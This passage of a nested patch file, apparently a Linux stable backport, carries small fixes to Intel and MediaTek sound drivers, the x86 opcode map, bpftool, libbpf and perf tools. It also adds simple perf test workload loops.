+--- a/sound/soc/intel/boards/kbl_rt5663_max98927.c
++++ b/sound/soc/intel/boards/kbl_rt5663_max98927.c
+@@ -966,6 +966,7 @@ static struct snd_soc_card kabylake_audio_card_rt5663_m98927 = {
+ 	.codec_conf = max98927_codec_conf,
+ 	.num_configs = ARRAY_SIZE(max98927_codec_conf),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = kabylake_card_late_probe,
+ };
+ 
+@@ -982,6 +983,7 @@ static struct snd_soc_card kabylake_audio_card_rt5663 = {
+ 	.dapm_routes = kabylake_5663_map,
+ 	.num_dapm_routes = ARRAY_SIZE(kabylake_5663_map),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = kabylake_card_late_probe,
+ };
+ 
+diff --git a/sound/soc/intel/boards/kbl_rt5663_rt5514_max98927.c b/sound/soc/intel/boards/kbl_rt5663_rt5514_max98927.c
+index 2c79fca57b19e..a15d2c30b6c46 100644
+--- a/sound/soc/intel/boards/kbl_rt5663_rt5514_max98927.c
++++ b/sound/soc/intel/boards/kbl_rt5663_rt5514_max98927.c
+@@ -791,6 +791,7 @@ static struct snd_soc_card kabylake_audio_card = {
+ 	.codec_conf = max98927_codec_conf,
+ 	.num_configs = ARRAY_SIZE(max98927_codec_conf),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = kabylake_card_late_probe,
+ };
+ 
+diff --git a/sound/soc/intel/boards/skl_hda_dsp_generic.c b/sound/soc/intel/boards/skl_hda_dsp_generic.c
+index 463ffb85121d3..2e1c1e4013c3f 100644
+--- a/sound/soc/intel/boards/skl_hda_dsp_generic.c
++++ b/sound/soc/intel/boards/skl_hda_dsp_generic.c
+@@ -231,6 +231,8 @@ static int skl_hda_audio_probe(struct platform_device *pdev)
+ 	ctx->common_hdmi_codec_drv = mach->mach_params.common_hdmi_codec_drv;
+ 
+ 	hda_soc_card.dev = &pdev->dev;
++	if (!snd_soc_acpi_sof_parent(&pdev->dev))
++		hda_soc_card.disable_route_checks = true;
+ 
+ 	if (mach->mach_params.dmic_num > 0) {
+ 		snprintf(hda_soc_components, sizeof(hda_soc_components),
+diff --git a/sound/soc/intel/boards/skl_nau88l25_max98357a.c b/sound/soc/intel/boards/skl_nau88l25_max98357a.c
+index 8dceb0b025812..8180afb4505bc 100644
+--- a/sound/soc/intel/boards/skl_nau88l25_max98357a.c
++++ b/sound/soc/intel/boards/skl_nau88l25_max98357a.c
+@@ -654,6 +654,7 @@ static struct snd_soc_card skylake_audio_card = {
+ 	.dapm_routes = skylake_map,
+ 	.num_dapm_routes = ARRAY_SIZE(skylake_map),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = skylake_card_late_probe,
+ };
+ 
+diff --git a/sound/soc/intel/boards/skl_rt286.c b/sound/soc/intel/boards/skl_rt286.c
+index 4f3d655e2bfa8..0a4795a94a768 100644
+--- a/sound/soc/intel/boards/skl_rt286.c
++++ b/sound/soc/intel/boards/skl_rt286.c
+@@ -523,6 +523,7 @@ static struct snd_soc_card skylake_rt286 = {
+ 	.dapm_routes = skylake_rt286_map,
+ 	.num_dapm_routes = ARRAY_SIZE(skylake_rt286_map),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = skylake_card_late_probe,
+ };
+ 
+diff --git a/sound/soc/kirkwood/kirkwood-dma.c b/sound/soc/kirkwood/kirkwood-dma.c
+index 640cebd2983e2..16d2c9acc33a6 100644
+--- a/sound/soc/kirkwood/kirkwood-dma.c
++++ b/sound/soc/kirkwood/kirkwood-dma.c
+@@ -182,6 +182,9 @@ static int kirkwood_dma_hw_params(struct snd_soc_component *component,
+ 	const struct mbus_dram_target_info *dram = mv_mbus_dram_info();
+ 	unsigned long addr = substream->runtime->dma_addr;
+ 
++	if (!dram)
++		return 0;
++
+ 	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
+ 		kirkwood_dma_conf_mbus_windows(priv->io,
+ 			KIRKWOOD_PLAYBACK_WIN, addr, dram);
+diff --git a/sound/soc/mediatek/mt8192/mt8192-dai-tdm.c b/sound/soc/mediatek/mt8192/mt8192-dai-tdm.c
+index f3bebed2428a7..360259e60de84 100644
+--- a/sound/soc/mediatek/mt8192/mt8192-dai-tdm.c
++++ b/sound/soc/mediatek/mt8192/mt8192-dai-tdm.c
+@@ -566,10 +566,10 @@ static int mtk_dai_tdm_hw_params(struct snd_pcm_substream *substream,
+ 		tdm_con |= 1 << DELAY_DATA_SFT;
+ 		tdm_con |= get_tdm_lrck_width(format) << LRCK_TDM_WIDTH_SFT;
+ 	} else if (tdm_priv->tdm_out_mode == TDM_OUT_DSP_A) {
+-		tdm_con |= 0 << DELAY_DATA_SFT;
++		tdm_con |= 1 << DELAY_DATA_SFT;
+ 		tdm_con |= 0 << LRCK_TDM_WIDTH_SFT;
+ 	} else if (tdm_priv->tdm_out_mode == TDM_OUT_DSP_B) {
+-		tdm_con |= 1 << DELAY_DATA_SFT;
++		tdm_con |= 0 << DELAY_DATA_SFT;
+ 		tdm_con |= 0 << LRCK_TDM_WIDTH_SFT;
+ 	}
+ 
+diff --git a/tools/arch/x86/lib/x86-opcode-map.txt b/tools/arch/x86/lib/x86-opcode-map.txt
+index d12d1358f96d2..8eaf140172c58 100644
+--- a/tools/arch/x86/lib/x86-opcode-map.txt
++++ b/tools/arch/x86/lib/x86-opcode-map.txt
+@@ -148,7 +148,7 @@ AVXcode:
+ 65: SEG=GS (Prefix)
+ 66: Operand-Size (Prefix)
+ 67: Address-Size (Prefix)
+-68: PUSH Iz (d64)
++68: PUSH Iz
+ 69: IMUL Gv,Ev,Iz
+ 6a: PUSH Ib (d64)
+ 6b: IMUL Gv,Ev,Ib
+@@ -698,10 +698,10 @@ AVXcode: 2
+ 4d: vrcp14ss/d Vsd,Hpd,Wsd (66),(ev)
+ 4e: vrsqrt14ps/d Vpd,Wpd (66),(ev)
+ 4f: vrsqrt14ss/d Vsd,Hsd,Wsd (66),(ev)
+-50: vpdpbusd Vx,Hx,Wx (66),(ev)
+-51: vpdpbusds Vx,Hx,Wx (66),(ev)
+-52: vdpbf16ps Vx,Hx,Wx (F3),(ev) | vpdpwssd Vx,Hx,Wx (66),(ev) | vp4dpwssd Vdqq,Hdqq,Wdq (F2),(ev)
+-53: vpdpwssds Vx,Hx,Wx (66),(ev) | vp4dpwssds Vdqq,Hdqq,Wdq (F2),(ev)
++50: vpdpbusd Vx,Hx,Wx (66)
++51: vpdpbusds Vx,Hx,Wx (66)
++52: vdpbf16ps Vx,Hx,Wx (F3),(ev) | vpdpwssd Vx,Hx,Wx (66) | vp4dpwssd Vdqq,Hdqq,Wdq (F2),(ev)
++53: vpdpwssds Vx,Hx,Wx (66) | vp4dpwssds Vdqq,Hdqq,Wdq (F2),(ev)
+ 54: vpopcntb/w Vx,Wx (66),(ev)
+ 55: vpopcntd/q Vx,Wx (66),(ev)
+ 58: vpbroadcastd Vx,Wx (66),(v)
+diff --git a/tools/bpf/bpftool/skeleton/pid_iter.bpf.c b/tools/bpf/bpftool/skeleton/pid_iter.bpf.c
+index 26004f0c5a6ae..7bdbcac3cf628 100644
+--- a/tools/bpf/bpftool/skeleton/pid_iter.bpf.c
++++ b/tools/bpf/bpftool/skeleton/pid_iter.bpf.c
+@@ -102,8 +102,8 @@ int iter(struct bpf_iter__task_file *ctx)
+ 				       BPF_LINK_TYPE_PERF_EVENT___local)) {
+ 		struct bpf_link *link = (struct bpf_link *) file->private_data;
+ 
+-		if (link->type == bpf_core_enum_value(enum bpf_link_type___local,
+-						      BPF_LINK_TYPE_PERF_EVENT___local)) {
++		if (BPF_CORE_READ(link, type) == bpf_core_enum_value(enum bpf_link_type___local,
++								     BPF_LINK_TYPE_PERF_EVENT___local)) {
+ 			e.has_bpf_cookie = true;
+ 			e.bpf_cookie = get_bpf_cookie(link);
+ 		}
+diff --git a/tools/bpf/resolve_btfids/main.c b/tools/bpf/resolve_btfids/main.c
+index ef0764d6891e4..82bffa7cf8659 100644
+--- a/tools/bpf/resolve_btfids/main.c
++++ b/tools/bpf/resolve_btfids/main.c
+@@ -728,7 +728,7 @@ static int sets_patch(struct object *obj)
+ 
+ static int symbols_patch(struct object *obj)
+ {
+-	int err;
++	off_t err;
+ 
+ 	if (__symbols_patch(obj, &obj->structs)  ||
+ 	    __symbols_patch(obj, &obj->unions)   ||
+diff --git a/tools/include/nolibc/stdlib.h b/tools/include/nolibc/stdlib.h
+index a24000d1e8222..c0c3854b3f35b 100644
+--- a/tools/include/nolibc/stdlib.h
++++ b/tools/include/nolibc/stdlib.h
+@@ -166,7 +166,7 @@ void *realloc(void *old_ptr, size_t new_size)
+ 	if (__builtin_expect(!ret, 0))
+ 		return NULL;
+ 
+-	memcpy(ret, heap->user_p, heap->len);
++	memcpy(ret, heap->user_p, user_p_len);
+ 	munmap(heap, heap->len);
+ 	return ret;
+ }
+diff --git a/tools/include/uapi/linux/bpf.h b/tools/include/uapi/linux/bpf.h
+index d5d2183730b9f..a17688011440e 100644
+--- a/tools/include/uapi/linux/bpf.h
++++ b/tools/include/uapi/linux/bpf.h
+@@ -6730,7 +6730,7 @@ struct bpf_fib_lookup {
+ 
+ 		/* output: MTU value */
+ 		__u16	mtu_result;
+-	};
++	} __attribute__((packed, aligned(2)));
+ 	/* input: L3 device index for lookup
+ 	 * output: device index from FIB lookup
+ 	 */
+diff --git a/tools/lib/bpf/libbpf.c b/tools/lib/bpf/libbpf.c
+index c71d4d0f5c6f3..bb27dfd6b97a7 100644
+--- a/tools/lib/bpf/libbpf.c
++++ b/tools/lib/bpf/libbpf.c
+@@ -10417,7 +10417,7 @@ static int attach_kprobe_multi(const struct bpf_program *prog, long cookie, stru
+ 
+ 	n = sscanf(spec, "%m[a-zA-Z0-9_.*?]", &pattern);
+ 	if (n < 1) {
+-		pr_warn("kprobe multi pattern is invalid: %s\n", pattern);
++		pr_warn("kprobe multi pattern is invalid: %s\n", spec);
+ 		return -EINVAL;
+ 	}
+ 
+diff --git a/tools/lib/subcmd/parse-options.c b/tools/lib/subcmd/parse-options.c
+index 9fa75943f2ed1..d943d78b787ed 100644
+--- a/tools/lib/subcmd/parse-options.c
++++ b/tools/lib/subcmd/parse-options.c
+@@ -633,11 +633,10 @@ int parse_options_subcommand(int argc, const char **argv, const struct option *o
+ 			const char *const subcommands[], const char *usagestr[], int flags)
+ {
+ 	struct parse_opt_ctx_t ctx;
++	char *buf = NULL;
+ 
+ 	/* build usage string if it's not provided */
+ 	if (subcommands && !usagestr[0]) {
+-		char *buf = NULL;
+-
+ 		astrcatf(&buf, "%s %s [<options>] {", subcmd_config.exec_name, argv[0]);
+ 
+ 		for (int i = 0; subcommands[i]; i++) {
+@@ -679,7 +678,10 @@ int parse_options_subcommand(int argc, const char **argv, const struct option *o
+ 			astrcatf(&error_buf, "unknown switch `%c'", *ctx.opt);
+ 		usage_with_options(usagestr, options);
+ 	}
+-
++	if (buf) {
++		usagestr[0] = NULL;
++		free(buf);
++	}
+ 	return parse_options_end(&ctx);
+ }
+ 
+diff --git a/tools/perf/Documentation/perf-list.txt b/tools/perf/Documentation/perf-list.txt
+index 57384a97c04f4..3dae696b748a6 100644
+--- a/tools/perf/Documentation/perf-list.txt
++++ b/tools/perf/Documentation/perf-list.txt
+@@ -63,6 +63,7 @@ counted. The following modifiers exist:
+  D - pin the event to the PMU
+  W - group is weak and will fallback to non-group if not schedulable,
+  e - group or event are exclusive and do not share the PMU
++ b - use BPF aggregration (see perf stat --bpf-counters)
+ 
+ The 'p' modifier can be used for specifying how precise the instruction
+ address should be. The 'p' modifier can be specified multiple times:
+diff --git a/tools/perf/bench/inject-buildid.c b/tools/perf/bench/inject-buildid.c
+index 17672790f1231..d1672be702f3b 100644
+--- a/tools/perf/bench/inject-buildid.c
++++ b/tools/perf/bench/inject-buildid.c
+@@ -361,7 +361,7 @@ static int inject_build_id(struct bench_data *data, u64 *max_rss)
+ 		return -1;
+ 
+ 	for (i = 0; i < nr_mmaps; i++) {
+-		int idx = rand() % (nr_dsos - 1);
++		int idx = rand() % nr_dsos;
+ 		struct bench_dso *dso = &dsos[idx];
+ 		u64 timestamp = rand() % 1000000;
+ 
+diff --git a/tools/perf/builtin-annotate.c b/tools/perf/builtin-annotate.c
+index 517d928c00e3f..21d7582608735 100644
+--- a/tools/perf/builtin-annotate.c
++++ b/tools/perf/builtin-annotate.c
+@@ -571,8 +571,6 @@ int cmd_annotate(int argc, const char **argv)
+ 		    "Enable symbol demangling"),
+ 	OPT_BOOLEAN(0, "demangle-kernel", &symbol_conf.demangle_kernel,
+ 		    "Enable kernel symbol demangling"),
+-	OPT_BOOLEAN(0, "group", &symbol_conf.event_group,
+-		    "Show event group information together"),
+ 	OPT_BOOLEAN(0, "show-total-period", &symbol_conf.show_total_period,
+ 		    "Show a column with the sum of periods"),
+ 	OPT_BOOLEAN('n', "show-nr-samples", &symbol_conf.show_nr_samples,
+diff --git a/tools/perf/builtin-daemon.c b/tools/perf/builtin-daemon.c
+index 6cb3f6cc36d0a..35942256582ab 100644
+--- a/tools/perf/builtin-daemon.c
++++ b/tools/perf/builtin-daemon.c
+@@ -523,7 +523,7 @@ static int daemon_session__control(struct daemon_session *session,
+ 		  session->base, SESSION_CONTROL);
+ 
+ 	control = open(control_path, O_WRONLY|O_NONBLOCK);
+-	if (!control)
++	if (control < 0)
+ 		return -1;
+ 
+ 	if (do_ack) {
+@@ -532,7 +532,7 @@ static int daemon_session__control(struct daemon_session *session,
+ 			  session->base, SESSION_ACK);
+ 
+ 		ack = open(ack_path, O_RDONLY, O_NONBLOCK);
+-		if (!ack) {
++		if (ack < 0) {
+ 			close(control);
+ 			return -1;
+ 		}
+diff --git a/tools/perf/builtin-record.c b/tools/perf/builtin-record.c
+index b9b0fda8374e2..ee3a5c4b8251e 100644
+--- a/tools/perf/builtin-record.c
++++ b/tools/perf/builtin-record.c
+@@ -2843,10 +2843,10 @@ static int __cmd_record(struct record *rec, int argc, const char **argv)
+ 	}
+ #endif
+ 	zstd_fini(&session->zstd_data);
+-	perf_session__delete(session);
+-
+ 	if (!opts->no_bpf_event)
+ 		evlist__stop_sb_thread(rec->sb_evlist);
++
++	perf_session__delete(session);
+ 	return status;
+ }
+ 
+diff --git a/tools/perf/builtin-report.c b/tools/perf/builtin-report.c
+index b6d77d3da64f6..155f119b3db5c 100644
+--- a/tools/perf/builtin-report.c
++++ b/tools/perf/builtin-report.c
+@@ -416,7 +416,7 @@ static int report__setup_sample_type(struct report *rep)
+ 		 * compatibility, set the bit if it's an old perf data file.
+ 		 */
+ 		evlist__for_each_entry(session->evlist, evsel) {
+-			if (strstr(evsel->name, "arm_spe") &&
++			if (strstr(evsel__name(evsel), "arm_spe") &&
+ 				!(sample_type & PERF_SAMPLE_DATA_SRC)) {
+ 				evsel->core.attr.sample_type |= PERF_SAMPLE_DATA_SRC;
+ 				sample_type |= PERF_SAMPLE_DATA_SRC;
+diff --git a/tools/perf/tests/Build b/tools/perf/tests/Build
+index 2064a640facbe..11b69023011b0 100644
+--- a/tools/perf/tests/Build
++++ b/tools/perf/tests/Build
+@@ -103,3 +103,5 @@ endif
+ CFLAGS_attr.o         += -DBINDIR="BUILD_STR($(bindir_SQ))" -DPYTHON="BUILD_STR($(PYTHON_WORD))"
+ CFLAGS_python-use.o   += -DPYTHONPATH="BUILD_STR($(OUTPUT)python)" -DPYTHON="BUILD_STR($(PYTHON_WORD))"
+ CFLAGS_dwarf-unwind.o += -fno-optimize-sibling-calls
++
++perf-y += workloads/
+diff --git a/tools/perf/tests/builtin-test.c b/tools/perf/tests/builtin-test.c
+index 7122eae1d98d9..4c6ae59a4dfd7 100644
+--- a/tools/perf/tests/builtin-test.c
++++ b/tools/perf/tests/builtin-test.c
+@@ -118,6 +118,15 @@ static struct test_suite **tests[] = {
+ 	arch_tests,
+ };
+ 
++static struct test_workload *workloads[] = {
++	&workload__noploop,
++	&workload__thloop,
++	&workload__leafloop,
++	&workload__sqrtloop,
++	&workload__brstack,
++	&workload__datasym,
++};
++
+ static int num_subtests(const struct test_suite *t)
+ {
+ 	int num;
+@@ -475,6 +484,21 @@ static int perf_test__list(int argc, const char **argv)
+ 	return 0;
+ }
+ 
++static int run_workload(const char *work, int argc, const char **argv)
++{
++	unsigned int i = 0;
++	struct test_workload *twl;
++
++	for (i = 0; i < ARRAY_SIZE(workloads); i++) {
++		twl = workloads[i];
++		if (!strcmp(twl->name, work))
++			return twl->func(argc, argv);
++	}
++
++	pr_info("No workload found: %s\n", work);
++	return -1;
++}
++
+ int cmd_test(int argc, const char **argv)
+ {
+ 	const char *test_usage[] = {
+@@ -482,12 +506,14 @@ int cmd_test(int argc, const char **argv)
+ 	NULL,
+ 	};
+ 	const char *skip = NULL;
++	const char *workload = NULL;
+ 	const struct option test_options[] = {
+ 	OPT_STRING('s', "skip", &skip, "tests", "tests to skip"),
+ 	OPT_INCR('v', "verbose", &verbose,
+ 		    "be more verbose (show symbol address, etc)"),
+ 	OPT_BOOLEAN('F', "dont-fork", &dont_fork,
+ 		    "Do not fork for testcase"),
++	OPT_STRING('w', "workload", &workload, "work", "workload to run for testing"),
+ 	OPT_END()
+ 	};
+ 	const char * const test_subcommands[] = { "list", NULL };
+@@ -504,6 +530,9 @@ int cmd_test(int argc, const char **argv)
+ 	if (argc >= 1 && !strcmp(argv[0], "list"))
+ 		return perf_test__list(argc - 1, argv + 1);
+ 
++	if (workload)
++		return run_workload(workload, argc, argv);
++
+ 	symbol_conf.priv_size = sizeof(int);
+ 	symbol_conf.sort_by_name = true;
+ 	symbol_conf.try_vmlinux_path = true;
+diff --git a/tools/perf/tests/tests.h b/tools/perf/tests/tests.h
+index 5bbb8f6a48fcb..e15f24cfc9094 100644
+--- a/tools/perf/tests/tests.h
++++ b/tools/perf/tests/tests.h
+@@ -180,4 +180,31 @@ int test__arch_unwind_sample(struct perf_sample *sample,
+ DECLARE_SUITE(vectors_page);
+ #endif
+ 
++/*
++ * Define test workloads to be used in test suites.
++ */
++typedef int (*workload_fnptr)(int argc, const char **argv);
++
++struct test_workload {
++	const char	*name;
++	workload_fnptr	func;
++};
++
++#define DECLARE_WORKLOAD(work) \
++	extern struct test_workload workload__##work
++
++#define DEFINE_WORKLOAD(work) \
++struct test_workload workload__##work = {	\
++	.name = #work,				\
++	.func = work,				\
++}
++
++/* The list of test workloads */
++DECLARE_WORKLOAD(noploop);
++DECLARE_WORKLOAD(thloop);
++DECLARE_WORKLOAD(leafloop);
++DECLARE_WORKLOAD(sqrtloop);
++DECLARE_WORKLOAD(brstack);
++DECLARE_WORKLOAD(datasym);
++
+ #endif /* TESTS_H */
+diff --git a/tools/perf/tests/workloads/Build b/tools/perf/tests/workloads/Build
+new file mode 100644
+index 0000000000000..a1f34d5861e36
+--- /dev/null
++++ b/tools/perf/tests/workloads/Build
+@@ -0,0 +1,13 @@
++# SPDX-License-Identifier: GPL-2.0
++
++perf-y += noploop.o
++perf-y += thloop.o
++perf-y += leafloop.o
++perf-y += sqrtloop.o
++perf-y += brstack.o
++perf-y += datasym.o
++
++CFLAGS_sqrtloop.o         = -g -O0 -fno-inline -U_FORTIFY_SOURCE
++CFLAGS_leafloop.o         = -g -O0 -fno-inline -fno-omit-frame-pointer -U_FORTIFY_SOURCE
++CFLAGS_brstack.o          = -g -O0 -fno-inline -U_FORTIFY_SOURCE
++CFLAGS_datasym.o          = -g -O0 -fno-inline -U_FORTIFY_SOURCE
+diff --git a/tools/perf/tests/workloads/brstack.c b/tools/perf/tests/workloads/brstack.c
+new file mode 100644
+index 0000000000000..0b60bd37b9d1a
+--- /dev/null
++++ b/tools/perf/tests/workloads/brstack.c
+@@ -0,0 +1,40 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#include <stdlib.h>
++#include "../tests.h"
++
++#define BENCH_RUNS 999999
++
++static volatile int cnt;
++
++static void brstack_bar(void) {
++}				/* return */
++
++static void brstack_foo(void) {
++	brstack_bar();		/* call */
++}				/* return */
++
++static void brstack_bench(void) {
++	void (*brstack_foo_ind)(void) = brstack_foo;
++
++	if ((cnt++) % 3)	/* branch (cond) */
++		brstack_foo();	/* call */
++	brstack_bar();		/* call */
++	brstack_foo_ind();	/* call (ind) */
++}
++
++static int brstack(int argc, const char **argv)
++{
++	int num_loops = BENCH_RUNS;
++
++	if (argc > 0)
++		num_loops = atoi(argv[0]);
++
++	while (1) {
++		if ((cnt++) > num_loops)
++			break;
++		brstack_bench();/* call */
++	}			/* branch (uncond) */
++	return 0;
++}
++
++DEFINE_WORKLOAD(brstack);
+diff --git a/tools/perf/tests/workloads/datasym.c b/tools/perf/tests/workloads/datasym.c
+new file mode 100644
+index 0000000000000..8e08fc75a973e
+--- /dev/null
++++ b/tools/perf/tests/workloads/datasym.c
+@@ -0,0 +1,40 @@
++#include <linux/compiler.h>
++#include "../tests.h"
++
++typedef struct _buf {
++	char data1;
++	char reserved[55];
++	char data2;
++} buf __attribute__((aligned(64)));
++
++static buf buf1 = {
++	/* to have this in the data section */
++	.reserved[0] = 1,
++};
++
++static int datasym(int argc __maybe_unused, const char **argv __maybe_unused)
++{
++	for (;;) {
++		buf1.data1++;
++		if (buf1.data1 == 123) {
++			/*
++			 * Add some 'noise' in the loop to work around errata
++			 * 1694299 on Arm N1.
++			 *
++			 * Bias exists in SPE sampling which can cause the load
++			 * and store instructions to be skipped entirely. This
++			 * comes and goes randomly depending on the offset the
++			 * linker places the datasym loop at in the Perf binary.
++			 * With an extra branch in the middle of the loop that
++			 * isn't always taken, the instruction stream is no
++			 * longer a continuous repeating pattern that interacts
++			 * badly with the bias.
++			 */
++			buf1.data1++;
++		}
++		buf1.data2 += buf1.data1;
++	}
++	return 0;
++}
++
++DEFINE_WORKLOAD(datasym);
+diff --git a/tools/perf/tests/workloads/leafloop.c b/tools/perf/tests/workloads/leafloop.c
+new file mode 100644
+index 0000000000000..1bf5cc97649b0
+--- /dev/null
++++ b/tools/perf/tests/workloads/leafloop.c
+@@ -0,0 +1,34 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#include <stdlib.h>
++#include <linux/compiler.h>
++#include "../tests.h"
++
++/* We want to check these symbols in perf script */
++noinline void leaf(volatile int b);
++noinline void parent(volatile int b);
++
++static volatile int a;
++
++noinline void leaf(volatile int b)
++{
++	for (;;)
++		a += b;
++}
++
++noinline void parent(volatile int b)
++{
++	leaf(b);
++}
++
++static int leafloop(int argc, const char **argv)
++{
++	int c = 1;
++
++	if (argc > 0)
++		c = atoi(argv[0]);
++
++	parent(c);
++	return 0;
++}
++
++DEFINE_WORKLOAD(leafloop);
+diff --git a/tools/perf/tests/workloads/noploop.c b/tools/perf/tests/workloads/noploop.c
+new file mode 100644
+index 0000000000000..940ea5910a84c
+--- /dev/null
++++ b/tools/perf/tests/workloads/noploop.c
+@@ -0,0 +1,32 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#include <stdlib.h>
++#include <signal.h>
++#include <unistd.h>
++#include <linux/compiler.h>
++#include "../tests.h"
++
++static volatile sig_atomic_t done;
++
++static void sighandler(int sig __maybe_unused)
++{
++	done = 1;
++}
++
++static int noploop(int argc, const char **argv)
++{
++	int sec = 1;
++
++	if (argc > 0)
++		sec = atoi(argv[0]);
++
++	signal(SIGINT, sighandler);
++	signal(SIGALRM, sighandler);
++	alarm(sec);
++
++	while (!done)
++		continue;
++
++	return 0;
++}
++
++DEFINE_WORKLOAD(noploop);
+diff --git a/tools/perf/tests/workloads/sqrtloop.c b/tools/perf/tests/workloads/sqrtloop.c
+new file mode 100644
+index 0000000000000..ccc94c6a6676a
+--- /dev/null
++++ b/tools/perf/tests/workloads/sqrtloop.c
+@@ -0,0 +1,45 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#include <math.h>
++#include <signal.h>
++#include <stdlib.h>
++#include <unistd.h>
++#include <linux/compiler.h>
++#include <sys/wait.h>
++#include "../tests.h"
++
++static volatile sig_atomic_t done;
++
++static void sighandler(int sig __maybe_unused)
++{
++	done = 1;
++}
++
++static int __sqrtloop(int sec)
++{
++	signal(SIGALRM, sighandler);
++	alarm(sec);
++
++	while (!done)
++		(void)sqrt(rand());
++	return 0;
++}
++
++static int sqrtloop(int argc, const char **argv)
++{
++	int sec = 1;
++
++	if (argc > 0)
++		sec = atoi(argv[0]);
++
++	switch (fork()) {
++	case 0:
++		return __sqrtloop(sec);
++	case -1:
++		return -1;
++	default:
++		wait(NULL);
++	}
++	return 0;
++}
++
++DEFINE_WORKLOAD(sqrtloop);
+diff --git a/tools/perf/tests/workloads/thloop.c b/tools/perf/tests/workloads/thloop.c
+new file mode 100644
+index 0000000000000..29193b75717ef
+--- /dev/null
++++ b/tools/perf/tests/workloads/thloop.c
+@@ -0,0 +1,53 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#include <pthread.h>
++#include <stdlib.h>
++#include <signal.h>
++#include <unistd.h>
++#include <linux/compiler.h>
++#include "../tests.h"
++
++static volatile sig_atomic_t done;
++static volatile unsigned count;
++
++/* We want to check this symbol in perf report */
++noinline void test_loop(void);
++
++static void sighandler(int sig __maybe_unused)
++{
++	done = 1;
++}
++
++noinline void test_loop(void)
++{
++	while (!done)
++		count++;
++}
++
++static void *thfunc(void *arg)
++{
++	void (*loop_fn)(void) = arg;
++
++	loop_fn();
++	return NULL;
++}
++
++static int thloop(int argc, const char **argv)
++{
++	int sec = 1;
++	pthread_t th;
++
++	if (argc > 0)
++		sec = atoi(argv[0]);
++
++	signal(SIGINT, sighandler);
++	signal(SIGALRM, sighandler);
++	alarm(sec);
++
++	pthread_create(&th, NULL, thfunc, test_loop);
++	test_loop();
++	pthread_join(th, NULL);
++
++	return 0;
++}
++
++DEFINE_WORKLOAD(thloop);
+diff --git a/tools/perf/ui/browser.c b/tools/perf/ui/browser.c
+index 78fb01d6ad63f..5d6f4f25c33d0 100644
+--- a/tools/perf/ui/browser.c
++++ b/tools/perf/ui/browser.c
+@@ -203,7 +203,7 @@ void ui_browser__refresh_dimensions(struct ui_browser *browser)
+ void ui_browser__handle_resize(struct ui_browser *browser)
+ {
+ 	ui__refresh_dimensions(false);
+-	ui_browser__show(browser, browser->title, ui_helpline__current);
++	ui_browser__show(browser, browser->title ?: "", ui_helpline__current);
+ 	ui_browser__refresh(browser);
+ }
+ 
+@@ -287,7 +287,8 @@ int ui_browser__show(struct ui_browser *browser, const char *title,
+ 	mutex_lock(&ui__lock);
+ 	__ui_browser__show_title(browser, title);
+ 
+-	browser->title = title;
++	free(browser->title);
++	browser->title = strdup(title);
+ 	zfree(&browser->helpline);
+ 
+ 	va_start(ap, helpline);
+@@ -304,6 +305,7 @@ void ui_browser__hide(struct ui_browser *browser)
+ 	mutex_lock(&ui__lock);
+ 	ui_helpline__pop();
+ 	zfree(&browser->helpline);
++	zfree(&browser->title);
+ 	mutex_unlock(&ui__lock);
+ }
+ 
+diff --git a/tools/perf/ui/browser.h b/tools/perf/ui/browser.h
+index 510ce45540501..6e98d5f8f71cc 100644
+--- a/tools/perf/ui/browser.h
++++ b/tools/perf/ui/browser.h
+@@ -21,7 +21,7 @@ struct ui_browser {
+ 	u8	      extra_title_lines;
+ 	int	      current_color;
+ 	void	      *priv;
+-	const char    *title;
++	char	      *title;
+ 	char	      *helpline;
+ 	const char    *no_samples_msg;
+ 	void 	      (*refresh_dimensions)(struct ui_browser *browser);
+diff --git a/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c b/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c
+index 7145c5890de02..178baa1e69493 100644
+--- a/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c
++++ b/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c
+@@ -1319,6 +1319,8 @@ static bool intel_pt_fup_event(struct intel_pt_decoder *decoder, bool no_tip)
+ 	bool ret = false;
+ 
+ 	decoder->state.type &= ~INTEL_PT_BRANCH;
++	decoder->state.insn_op = INTEL_PT_OP_OTHER;
++	decoder->state.insn_len = 0;
+ 
+ 	if (decoder->set_fup_cfe_ip || decoder->set_fup_cfe) {
+ 		bool ip = decoder->set_fup_cfe_ip;
+diff --git a/tools/perf/util/intel-pt.c b/tools/perf/util/intel-pt.c
+index 6fb64c58b408b..bd09af447eb0d 100644
+--- a/tools/perf/util/intel-pt.c
++++ b/tools/perf/util/intel-pt.c
+@@ -755,6 +755,7 @@ static int intel_pt_walk_next_insn(struct intel_pt_insn *intel_pt_insn,
+ 	bool nr;
+ 
+ 	intel_pt_insn->length = 0;
++	intel_pt_insn->op = INTEL_PT_OP_OTHER;
+ 
+ 	if (to_ip && *ip == to_ip)
+ 		goto out_no_cache;
+@@ -876,6 +877,7 @@ static int intel_pt_walk_next_insn(struct intel_pt_insn *intel_pt_insn,
+ 
+ 			if (to_ip && *ip == to_ip) {
+ 				intel_pt_insn->length = 0;
++				intel_pt_insn->op = INTEL_PT_OP_OTHER;
+ 				goto out_no_cache;
+ 			}
+ 
+diff --git a/tools/perf/util/probe-event.c b/tools/perf/util/probe-event.c
+index 0c24bc7afbca2..66ff8420ce2b0 100644
+--- a/tools/perf/util/probe-event.c
++++ b/tools/perf/util/probe-event.c
+@@ -11,6 +11,7 @@
+ #include <sys/stat.h>
+ #include <fcntl.h>
+ #include <errno.h>
++#include <libgen.h>
+ #include <stdio.h>
+ #include <unistd.h>
+ #include <stdlib.h>
+diff --git a/tools/perf/util/stat-display.c b/tools/perf/util/stat-display.c
+index ef9a3df459657..9053db0dc00a1 100644
+--- a/tools/perf/util/stat-display.c
++++ b/tools/perf/util/stat-display.c
+@@ -1162,6 +1162,9 @@ static void print_metric_headers(struct perf_stat_config *config,
+ 
+ 	/* Print metrics headers only */
